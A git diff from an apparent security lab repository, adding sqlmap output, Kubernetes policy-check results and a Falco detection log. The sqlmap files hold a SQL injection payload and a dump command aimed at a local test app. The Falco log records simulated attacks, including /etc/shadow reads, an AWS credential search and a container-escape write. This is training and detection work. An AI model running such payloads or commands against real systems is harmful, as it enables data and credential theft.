diff --git a/.github/pull_request_template.md b/.github/pull_request_template.md
new file mode 100644
index 00000000..b65a6540
--- /dev/null
+++ b/.github/pull_request_template.md
@@ -0,0 +1,9 @@
+# Goal 
+Submitting my homework for lab#
+
+# Changes
+- Added submissionXX.md
+
+# Checklist
+- [x] Task 1 done
+- [x] Task 2 done
\ No newline at end of file
diff --git a/labs/lab5/sqlmap/localhost/log b/labs/lab5/sqlmap/localhost/log
new file mode 100644
index 00000000..4cabc56c
--- /dev/null
+++ b/labs/lab5/sqlmap/localhost/log
@@ -0,0 +1,8 @@
+sqlmap identified the following injection point(s) with a total of 41 HTTP(s) requests:
+---
+Parameter: #1* (URI)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload: http://localhost:3000/rest/products/search?q=') AND 6254=6254 AND ('jcto' LIKE 'jcto
+---
+back-end DBMS: SQLite
diff --git a/labs/lab5/sqlmap/localhost/session.sqlite b/labs/lab5/sqlmap/localhost/session.sqlite
new file mode 100644
index 00000000..bc78069a
Binary files /dev/null and b/labs/lab5/sqlmap/localhost/session.sqlite differ
diff --git a/labs/lab5/sqlmap/localhost/target.txt b/labs/lab5/sqlmap/localhost/target.txt
new file mode 100644
index 00000000..757e9155
--- /dev/null
+++ b/labs/lab5/sqlmap/localhost/target.txt
@@ -0,0 +1,3 @@
+http://localhost:3000/rest/user/login (POST)  # /sqlmap/sqlmap.py -u http://localhost:3000/rest/user/login --data {\"email\":\"*\",\"password\":\"test\"} --method POST "--headers=Content-Type: application/json" --dbms=sqlite --batch --level=5 --risk=3 --technique=BT --threads=5 --output-dir=/output --dump
+
+{"email":"*","password":"test"}
\ No newline at end of file
diff --git a/labs/lab9/analysis/conftest-compose.txt b/labs/lab9/analysis/conftest-compose.txt
new file mode 100644
index 00000000..ca9d30b8
--- /dev/null
+++ b/labs/lab9/analysis/conftest-compose.txt
@@ -0,0 +1,2 @@
+
+[32m15 tests, 15 passed, 0 warnings, 0 failures, 0 exceptions[0m
diff --git a/labs/lab9/analysis/conftest-hardened.txt b/labs/lab9/analysis/conftest-hardened.txt
new file mode 100644
index 00000000..9da25fba
--- /dev/null
+++ b/labs/lab9/analysis/conftest-hardened.txt
@@ -0,0 +1,2 @@
+
+[32m30 tests, 30 passed, 0 warnings, 0 failures, 0 exceptions[0m
diff --git a/labs/lab9/analysis/conftest-unhardened.txt b/labs/lab9/analysis/conftest-unhardened.txt
new file mode 100644
index 00000000..ff1049f3
--- /dev/null
+++ b/labs/lab9/analysis/conftest-unhardened.txt
@@ -0,0 +1,12 @@
+[33mWARN[0m - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" should define livenessProbe
+[33mWARN[0m - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" should define readinessProbe
+[31mFAIL[0m - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" missing resources.limits.cpu
+[31mFAIL[0m - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" missing resources.limits.memory
+[31mFAIL[0m - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" missing resources.requests.cpu
+[31mFAIL[0m - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" missing resources.requests.memory
+[31mFAIL[0m - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" must set allowPrivilegeEscalation: false
+[31mFAIL[0m - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" must set readOnlyRootFilesystem: true
+[31mFAIL[0m - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" must set runAsNonRoot: true
+[31mFAIL[0m - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" uses disallowed :latest tag
+
+[31m30 tests, 20 passed, 2 warnings, 8 failures, 0 exceptions[0m
diff --git a/labs/lab9/falco/logs/falco.log b/labs/lab9/falco/logs/falco.log
new file mode 100644
index 00000000..afa5f075
--- /dev/null
+++ b/labs/lab9/falco/logs/falco.log
@@ -0,0 +1,36 @@
+{"hostname":"571ea5bf0330","output":"2026-05-12T16:50:06.030673234+0000: Notice A shell was spawned in a container with an attached terminal | evt_type=execve user=root user_uid=0 user_loginuid=-1 process=sh proc_exepath=/bin/busybox parent=systemd command=sh -lc echo hello-from-shell terminal=34816 exe_flags=EXE_WRITABLE|EXE_LOWER_LAYER container_id=41575d6baa96 container_name=lab9-helper container_image_repository=alpine container_image_tag=3.19 k8s_pod_name=<NA> k8s_ns_name=<NA>","output_fields":{"container.id":"41575d6baa96","container.image.repository":"alpine","container.image.tag":"3.19","container.name":"lab9-helper","evt.arg.flags":"EXE_WRITABLE|EXE_LOWER_LAYER","evt.time.iso8601":1778604606030673234,"evt.type":"execve","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"sh -lc echo hello-from-shell","proc.exepath":"/bin/busybox","proc.name":"sh","proc.pname":"systemd","proc.tty":34816,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Notice","rule":"Terminal shell in container","source":"syscall","tags":["T1059","container","maturity_stable","mitre_execution","shell"],"time":"2026-05-12T16:50:06.030673234Z"}
+Events detected: 1
+Rule counts by severity:
+   NOTICE: 1
+Triggered rules by rule name:
+   Terminal shell in container: 1
+Events detected: 0
+Rule counts by severity:
+Triggered rules by rule name:
+Events detected: 0
+Rule counts by severity:
+Triggered rules by rule name:
+{"hostname":"571ea5bf0330","output":"2026-05-12T16:52:34.229939671+0000: Warning Falco Custom: File write in /usr/local/bin (container=lab9-helper user=root file=/usr/local/bin/custom-rule.txt flags=O_LARGEFILE|O_TRUNC|O_CREAT|O_WRONLY|O_F_CREATED|FD_UPPER_LAYER) container_id=41575d6baa96 container_name=lab9-helper container_image_repository=alpine container_image_tag=3.19 k8s_pod_name=<NA> k8s_ns_name=<NA>","output_fields":{"container.id":"41575d6baa96","container.image.repository":"alpine","container.image.tag":"3.19","container.name":"lab9-helper","evt.arg.flags":"O_LARGEFILE|O_TRUNC|O_CREAT|O_WRONLY|O_F_CREATED|FD_UPPER_LAYER","evt.time.iso8601":1778604754229939671,"fd.name":"/usr/local/bin/custom-rule.txt","k8s.ns.name":null,"k8s.pod.name":null,"user.name":"root"},"priority":"Warning","rule":"Write Binary Under UsrLocalBin","source":"syscall","tags":["compliance","container","drift"],"time":"2026-05-12T16:52:34.229939671Z"}
+{"hostname":"571ea5bf0330","output":"2026-05-12T16:52:58.864367126+0000: Warning Debugfs launched started in a privileged container | evt_type=execve user=root user_uid=0 user_loginuid=-1 process=debugfs proc_exepath=/usr/sbin/debugfs parent=event-generator command=debugfs -V terminal=0 exe_flags=EXE_WRITABLE|EXE_LOWER_LAYER container_id=620ecad49db3 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name=<NA> k8s_ns_name=<NA>","output_fields":{"container.id":"620ecad49db3","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.arg.flags":"EXE_WRITABLE|EXE_LOWER_LAYER","evt.time.iso8601":1778604778864367126,"evt.type":"execve","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"debugfs -V","proc.exepath":"/usr/sbin/debugfs","proc.name":"debugfs","proc.pname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Debugfs Launched in Privileged Container","source":"syscall","tags":["T1611","cis","container","maturity_stable","mitre_privilege_escalation","process"],"time":"2026-05-12T16:52:58.864367126Z"}
+{"hostname":"571ea5bf0330","output":"2026-05-12T16:52:58.965814587+0000: Warning Hardlinks created over sensitive files | target=/etc/shadow linkpath=/tmp/falco-event-generator-syscall-CreateHardlinkOverSensitiveFiles-2846876962/shadow_link evt_type=link user=root user_uid=0 user_loginuid=-1 process=ln proc_exepath=/bin/busybox parent=event-generator command=ln -v /etc/shadow /tmp/falco-event-generator-syscall-CreateHardlinkOverSensitiveFiles-2846876962/shadow_link terminal=0 container_id=620ecad49db3 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name=<NA> k8s_ns_name=<NA>","output_fields":{"container.id":"620ecad49db3","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.arg.newpath":"/tmp/falco-event-generator-syscall-CreateHardlinkOverSensitiveFiles-2846876962/shadow_link","evt.arg.oldpath":"/etc/shadow","evt.time.iso8601":1778604778965814587,"evt.type":"link","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"ln -v /etc/shadow /tmp/falco-event-generator-syscall-CreateHardlinkOverSensitiveFiles-2846876962/shadow_link","proc.exepath":"/bin/busybox","proc.name":"ln","proc.pname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Create Hardlink Over Sensitive Files","source":"syscall","tags":["T1555","container","filesystem","host","maturity_stable","mitre_credential_access"],"time":"2026-05-12T16:52:58.965814587Z"}
+{"hostname":"571ea5bf0330","output":"2026-05-12T16:52:59.088252047+0000: Critical Fileless execution via memfd_create | container_start_ts=1778604777834119987 proc_cwd=/ evt_res=SUCCESS proc_sname=event-generator gparent=containerd-shim evt_type=execve user=root user_uid=0 user_loginuid=-1 process=3 proc_exepath=memfd:program parent=event-generator command=3 run helper.DoNothing terminal=0 exe_flags=EXE_WRITABLE|EXE_FROM_MEMFD container_id=620ecad49db3 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name=<NA> k8s_ns_name=<NA>","output_fields":{"container.id":"620ecad49db3","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","container.start_ts":1778604777834119987,"evt.arg.flags":"EXE_WRITABLE|EXE_FROM_MEMFD","evt.res":"SUCCESS","evt.time.iso8601":1778604779088252047,"evt.type":"execve","k8s.ns.name":null,"k8s.pod.name":null,"proc.aname[2]":"containerd-shim","proc.cmdline":"3 run helper.DoNothing","proc.cwd":"/","proc.exepath":"memfd:program","proc.name":"3","proc.pname":"event-generator","proc.sname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Critical","rule":"Fileless execution via memfd_create","source":"syscall","tags":["T1620","container","host","maturity_stable","mitre_defense_evasion","process"],"time":"2026-05-12T16:52:59.088252047Z"}
+{"hostname":"571ea5bf0330","output":"2026-05-12T16:52:59.412158919+0000: Notice Shell spawned by untrusted binary | parent_exe=/tmp/falco-event-generator-syscall-spawned-1220429766/httpd parent_exepath=/bin/event-generator pcmdline=httpd --loglevel info run ^helper.RunShell$ gparent=event-generator ggparent=containerd-shim aname[4]=systemd aname[5]=<NA> aname[6]=<NA> aname[7]=<NA> evt_type=execve user=root user_uid=0 user_loginuid=-1 process=sh proc_exepath=/bin/busybox parent=httpd command=sh -c ls > /dev/null terminal=0 exe_flags=EXE_WRITABLE|EXE_LOWER_LAYER container_id=620ecad49db3 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name=<NA> k8s_ns_name=<NA>","output_fields":{"container.id":"620ecad49db3","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.arg.flags":"EXE_WRITABLE|EXE_LOWER_LAYER","evt.time.iso8601":1778604779412158919,"evt.type":"execve","k8s.ns.name":null,"k8s.pod.name":null,"proc.aname[2]":"event-generator","proc.aname[3]":"containerd-shim","proc.aname[4]":"systemd","proc.aname[5]":null,"proc.aname[6]":null,"proc.aname[7]":null,"proc.cmdline":"sh -c ls > /dev/null","proc.exepath":"/bin/busybox","proc.name":"sh","proc.pcmdline":"httpd --loglevel info run ^helper.RunShell$","proc.pexe":"/tmp/falco-event-generator-syscall-spawned-1220429766/httpd","proc.pexepath":"/bin/event-generator","proc.pname":"httpd","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Notice","rule":"Run shell untrusted","source":"syscall","tags":["T1059.004","container","host","maturity_stable","mitre_execution","process","shell"],"time":"2026-05-12T16:52:59.412158919Z"}
+{"hostname":"571ea5bf0330","output":"2026-05-12T16:52:59.609337428+0000: Notice Disallowed SSH Connection | connection=172.17.0.5:59408->172.66.147.243:443 lport=443 rport=59408 fd_type=ipv4 fd_proto=tcp evt_type=connect user=root user_uid=0 user_loginuid=-1 process=ssh proc_exepath=/usr/bin/ssh parent=event-generator command=ssh user@example.com -p 443 terminal=0 container_id=620ecad49db3 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name=<NA> k8s_ns_name=<NA>","output_fields":{"container.id":"620ecad49db3","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.time.iso8601":1778604779609337428,"evt.type":"connect","fd.l4proto":"tcp","fd.lport":443,"fd.name":"172.17.0.5:59408->172.66.147.243:443","fd.rport":59408,"fd.type":"ipv4","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"ssh user@example.com -p 443","proc.exepath":"/usr/bin/ssh","proc.name":"ssh","proc.pname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Notice","rule":"Disallowed SSH Connection Non Standard Port","source":"syscall","tags":["T1059","container","host","maturity_stable","mitre_execution","network","process"],"time":"2026-05-12T16:52:59.609337428Z"}
+{"hostname":"571ea5bf0330","output":"2026-05-12T16:52:59.755834434+0000: Warning Sensitive file opened for reading by non-trusted program | file=/etc/shadow gparent=systemd ggparent=<NA> gggparent=<NA> evt_type=openat user=root user_uid=0 user_loginuid=-1 process=event-generator proc_exepath=/bin/event-generator parent=containerd-shim command=event-generator run syscall terminal=0 container_id=620ecad49db3 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name=<NA> k8s_ns_name=<NA>","output_fields":{"container.id":"620ecad49db3","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.time.iso8601":1778604779755834434,"evt.type":"openat","fd.name":"/etc/shadow","k8s.ns.name":null,"k8s.pod.name":null,"proc.aname[2]":"systemd","proc.aname[3]":null,"proc.aname[4]":null,"proc.cmdline":"event-generator run syscall","proc.exepath":"/bin/event-generator","proc.name":"event-generator","proc.pname":"containerd-shim","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Read sensitive file untrusted","source":"syscall","tags":["T1555","container","filesystem","host","maturity_stable","mitre_credential_access"],"time":"2026-05-12T16:52:59.755834434Z"}
+{"hostname":"571ea5bf0330","output":"2026-05-12T16:52:59.856362943+0000: Warning File execution detected from /dev/shm | evt_res=SUCCESS file=<NA> proc_cwd=/ proc_pcmdline=event-generator run syscall user_loginname=<NA> group_gid=0 group_name=root evt_type=execve user=root user_uid=0 user_loginuid=-1 process=sh proc_exepath=/bin/busybox parent=event-generator command=sh -c /dev/shm/falco-event-generator-syscall-ExecutionFromDevShm-PKj6kq.sh terminal=0 exe_flags=EXE_WRITABLE|EXE_LOWER_LAYER container_id=620ecad49db3 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name=<NA> k8s_ns_name=<NA>","output_fields":{"container.id":"620ecad49db3","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.arg.flags":"EXE_WRITABLE|EXE_LOWER_LAYER","evt.res":"SUCCESS","evt.time.iso8601":1778604779856362943,"evt.type":"execve","fd.name":null,"group.gid":0,"group.name":"root","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"sh -c /dev/shm/falco-event-generator-syscall-ExecutionFromDevShm-PKj6kq.sh","proc.cwd":"/","proc.exepath":"/bin/busybox","proc.name":"sh","proc.pcmdline":"event-generator run syscall","proc.pname":"event-generator","proc.tty":0,"user.loginname":"<NA>","user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Execution from /dev/shm","source":"syscall","tags":["T1059.004","container","host","maturity_stable","mitre_execution"],"time":"2026-05-12T16:52:59.856362943Z"}
+{"hostname":"571ea5bf0330","output":"2026-05-12T16:52:59.856515719+0000: Warning File execution detected from /dev/shm | evt_res=EACCES file=<NA> proc_cwd=/ proc_pcmdline=event-generator run syscall user_loginname=<NA> group_gid=0 group_name=root evt_type=execve user=root user_uid=0 user_loginuid=-1 process=sh proc_exepath=/bin/busybox parent=event-generator command=sh -c /dev/shm/falco-event-generator-syscall-ExecutionFromDevShm-PKj6kq.sh terminal=0 exe_flags=EXE_WRITABLE|EXE_LOWER_LAYER container_id=620ecad49db3 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name=<NA> k8s_ns_name=<NA>","output_fields":{"container.id":"620ecad49db3","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.arg.flags":"EXE_WRITABLE|EXE_LOWER_LAYER","evt.res":"EACCES","evt.time.iso8601":1778604779856515719,"evt.type":"execve","fd.name":null,"group.gid":0,"group.name":"root","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"sh -c /dev/shm/falco-event-generator-syscall-ExecutionFromDevShm-PKj6kq.sh","proc.cwd":"/","proc.exepath":"/bin/busybox","proc.name":"sh","proc.pcmdline":"event-generator run syscall","proc.pname":"event-generator","proc.tty":0,"user.loginname":"<NA>","user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Execution from /dev/shm","source":"syscall","tags":["T1059.004","container","host","maturity_stable","mitre_execution"],"time":"2026-05-12T16:52:59.856515719Z"}
+{"hostname":"571ea5bf0330","output":"2026-05-12T16:52:59.956967461+0000: Warning Log files were tampered | file=/tmp/falco-event-generator-syscall-ClearLogActivities-4136259843/syslog evt_type=openat user=root user_uid=0 user_loginuid=-1 process=event-generator proc_exepath=/bin/event-generator parent=containerd-shim command=event-generator run syscall terminal=0 container_id=620ecad49db3 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name=<NA> k8s_ns_name=<NA>","output_fields":{"container.id":"620ecad49db3","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.time.iso8601":1778604779956967461,"evt.type":"openat","fd.name":"/tmp/falco-event-generator-syscall-ClearLogActivities-4136259843/syslog","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"event-generator run syscall","proc.exepath":"/bin/event-generator","proc.name":"event-generator","proc.pname":"containerd-shim","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Clear Log Activities","source":"syscall","tags":["NIST_800-53_AU-10","T1070","container","filesystem","host","maturity_stable","mitre_defense_evasion"],"time":"2026-05-12T16:52:59.956967461Z"}
+{"hostname":"571ea5bf0330","output":"2026-05-12T16:53:00.057451498+0000: Notice Detected potential PTRACE_TRACEME anti-debug attempt | proc_pcmdline=event-generator run syscall evt_type=ptrace user=root user_uid=0 user_loginuid=-1 process=event-generator proc_exepath=/bin/event-generator parent=event-generator command=event-generator run syscall terminal=0 container_id=620ecad49db3 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name=<NA> k8s_ns_name=<NA>","output_fields":{"container.id":"620ecad49db3","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.time.iso8601":1778604780057451498,"evt.type":"ptrace","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"event-generator run syscall","proc.exepath":"/bin/event-generator","proc.name":"event-generator","proc.pcmdline":"event-generator run syscall","proc.pname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Notice","rule":"PTRACE anti-debug attempt","source":"syscall","tags":["T1622","container","host","maturity_stable","mitre_defense_evasion","process"],"time":"2026-05-12T16:53:00.057451498Z"}
+{"hostname":"571ea5bf0330","output":"2026-05-12T16:53:00.258248742+0000: Warning Detected AWS credentials search activity | proc_pcmdline=event-generator run syscall proc_cwd=/ group_gid=0 group_name=root user_loginname=<NA> evt_type=execve user=root user_uid=0 user_loginuid=-1 process=find proc_exepath=/bin/busybox parent=event-generator command=find /tmp -maxdepth 1 -iname .aws/credentials terminal=0 exe_flags=EXE_WRITABLE|EXE_LOWER_LAYER container_id=620ecad49db3 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name=<NA> k8s_ns_name=<NA>","output_fields":{"container.id":"620ecad49db3","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.arg.flags":"EXE_WRITABLE|EXE_LOWER_LAYER","evt.time.iso8601":1778604780258248742,"evt.type":"execve","group.gid":0,"group.name":"root","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"find /tmp -maxdepth 1 -iname .aws/credentials","proc.cwd":"/","proc.exepath":"/bin/busybox","proc.name":"find","proc.pcmdline":"event-generator run syscall","proc.pname":"event-generator","proc.tty":0,"user.loginname":"<NA>","user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Find AWS Credentials","source":"syscall","tags":["T1552","aws","container","host","maturity_stable","mitre_credential_access","process"],"time":"2026-05-12T16:53:00.258248742Z"}
+{"hostname":"571ea5bf0330","output":"2026-05-12T16:53:00.358643284+0000: Warning Read monitored file via directory traversal | file=/etc/shadow fileraw=/etc/../etc/../etc/shadow gparent=systemd ggparent=<NA> gggparent=<NA> evt_type=openat user=root user_uid=0 user_loginuid=-1 process=event-generator proc_exepath=/bin/event-generator parent=containerd-shim command=event-generator run syscall terminal=0 container_id=620ecad49db3 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name=<NA> k8s_ns_name=<NA>","output_fields":{"container.id":"620ecad49db3","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.time.iso8601":1778604780358643284,"evt.type":"openat","fd.name":"/etc/shadow","fd.nameraw":"/etc/../etc/../etc/shadow","k8s.ns.name":null,"k8s.pod.name":null,"proc.aname[2]":"systemd","proc.aname[3]":null,"proc.aname[4]":null,"proc.cmdline":"event-generator run syscall","proc.exepath":"/bin/event-generator","proc.name":"event-generator","proc.pname":"containerd-shim","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Directory traversal monitored file read","source":"syscall","tags":["T1555","container","filesystem","host","maturity_stable","mitre_credential_access"],"time":"2026-05-12T16:53:00.358643284Z"}
+{"hostname":"571ea5bf0330","output":"2026-05-12T16:53:00.459127889+0000: Warning Bulk data has been removed from disk | file=<NA> evt_type=execve user=root user_uid=0 user_loginuid=-1 process=shred proc_exepath=/bin/busybox parent=event-generator command=shred -u /tmp/falco-event-generator-syscall-RemoveBulkDataFromDisk-2515572500 terminal=0 exe_flags=EXE_WRITABLE|EXE_LOWER_LAYER container_id=620ecad49db3 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name=<NA> k8s_ns_name=<NA>","output_fields":{"container.id":"620ecad49db3","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.arg.flags":"EXE_WRITABLE|EXE_LOWER_LAYER","evt.time.iso8601":1778604780459127889,"evt.type":"execve","fd.name":null,"k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"shred -u /tmp/falco-event-generator-syscall-RemoveBulkDataFromDisk-2515572500","proc.exepath":"/bin/busybox","proc.name":"shred","proc.pname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Remove Bulk Data from Disk","source":"syscall","tags":["T1485","container","filesystem","host","maturity_stable","mitre_impact","process"],"time":"2026-05-12T16:53:00.459127889Z"}
+{"hostname":"571ea5bf0330","output":"2026-05-12T16:53:00.561041492+0000: Notice Packet socket was created in a container | socket_info=fd=6(<o>) domain=17(AF_PACKET) type=3 proto=3 connection= lport=<NA> rport=<NA> fd_type=<NA> fd_proto=<NA> evt_type=socket user=root user_uid=0 user_loginuid=-1 process=event-generator proc_exepath=/bin/event-generator parent=containerd-shim command=event-generator run syscall terminal=0 container_id=620ecad49db3 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name=<NA> k8s_ns_name=<NA>","output_fields":{"container.id":"620ecad49db3","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.args":"fd=6(<o>) domain=17(AF_PACKET) type=3 proto=3","evt.time.iso8601":1778604780561041492,"evt.type":"socket","fd.l4proto":"<NA>","fd.lport":null,"fd.name":"","fd.rport":null,"fd.type":"<NA>","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"event-generator run syscall","proc.exepath":"/bin/event-generator","proc.name":"event-generator","proc.pname":"containerd-shim","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Notice","rule":"Packet socket created in container","source":"syscall","tags":["T1557.002","container","maturity_stable","mitre_credential_access","network"],"time":"2026-05-12T16:53:00.561041492Z"}
+{"hostname":"571ea5bf0330","output":"2026-05-12T16:53:00.666240911+0000: Informational System user ran an interactive command | evt_type=execve user=daemon user_uid=2 user_loginuid=-1 process=login proc_exepath=/bin/busybox parent=event-generator command=login terminal=0 exe_flags=EXE_LOWER_LAYER container_id=620ecad49db3 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name=<NA> k8s_ns_name=<NA>","output_fields":{"container.id":"620ecad49db3","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.arg.flags":"EXE_LOWER_LAYER","evt.time.iso8601":1778604780666240911,"evt.type":"execve","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"login","proc.exepath":"/bin/busybox","proc.name":"login","proc.pname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"daemon","user.uid":2},"priority":"Informational","rule":"System user interactive","source":"syscall","tags":["NIST_800-53_AC-2","T1059","container","host","maturity_stable","mitre_execution","users"],"time":"2026-05-12T16:53:00.666240911Z"}
+{"hostname":"571ea5bf0330","output":"2026-05-12T16:53:00.873326499+0000: Critical Detect an attempt to exploit a container escape using release_agent file | file=/release_agent cap_effective=CAP_CHOWN CAP_DAC_OVERRIDE CAP_DAC_READ_SEARCH CAP_FOWNER CAP_FSETID CAP_KILL CAP_SETGID CAP_SETUID CAP_SETPCAP CAP_LINUX_IMMUTABLE CAP_NET_BIND_SERVICE CAP_NET_BROADCAST CAP_NET_ADMIN CAP_NET_RAW CAP_IPC_LOCK CAP_IPC_OWNER CAP_SYS_MODULE CAP_SYS_RAWIO CAP_SYS_CHROOT CAP_SYS_PTRACE CAP_SYS_PACCT CAP_SYS_ADMIN CAP_SYS_BOOT CAP_SYS_NICE CAP_SYS_RESOURCE CAP_SYS_TIME CAP_SYS_TTY_CONFIG CAP_MKNOD CAP_LEASE CAP_AUDIT_WRITE CAP_AUDIT_CONTROL CAP_SETFCAP CAP_MAC_OVERRIDE CAP_MAC_ADMIN CAP_SYSLOG CAP_WAKE_ALARM CAP_BLOCK_SUSPEND CAP_AUDIT_READ CAP_PERFMON CAP_BPF CAP_CHECKPOINT_RESTORE evt_type=open user=root user_uid=0 user_loginuid=-1 process=sh proc_exepath=/bin/busybox parent=event-generator command=sh -c echo 'hello world' > release_agent terminal=0 container_id=620ecad49db3 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name=<NA> k8s_ns_name=<NA>","output_fields":{"container.id":"620ecad49db3","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.time.iso8601":1778604780873326499,"evt.type":"open","fd.name":"/release_agent","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"sh -c echo 'hello world' > release_agent","proc.exepath":"/bin/busybox","proc.name":"sh","proc.pname":"event-generator","proc.tty":0,"thread.cap_effective":"CAP_CHOWN CAP_DAC_OVERRIDE CAP_DAC_READ_SEARCH CAP_FOWNER CAP_FSETID CAP_KILL CAP_SETGID CAP_SETUID CAP_SETPCAP CAP_LINUX_IMMUTABLE CAP_NET_BIND_SERVICE CAP_NET_BROADCAST CAP_NET_ADMIN CAP_NET_RAW CAP_IPC_LOCK CAP_IPC_OWNER CAP_SYS_MODULE CAP_SYS_RAWIO CAP_SYS_CHROOT CAP_SYS_PTRACE CAP_SYS_PACCT CAP_SYS_ADMIN CAP_SYS_BOOT CAP_SYS_NICE CAP_SYS_RESOURCE CAP_SYS_TIME CAP_SYS_TTY_CONFIG CAP_MKNOD CAP_LEASE CAP_AUDIT_WRITE CAP_AUDIT_CONTROL CAP_SETFCAP CAP_MAC_OVERRIDE CAP_MAC_ADMIN CAP_SYSLOG CAP_WAKE_ALARM CAP_BLOCK_SUSPEND CAP_AUDIT_READ CAP_PERFMON CAP_BPF CAP_CHECKPOINT_RESTORE","user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Critical","rule":"Detect release_agent File Container Escapes","source":"syscall","tags":["T1611","container","maturity_stable","mitre_privilege_escalation","process"],"time":"2026-05-12T16:53:00.873326499Z"}
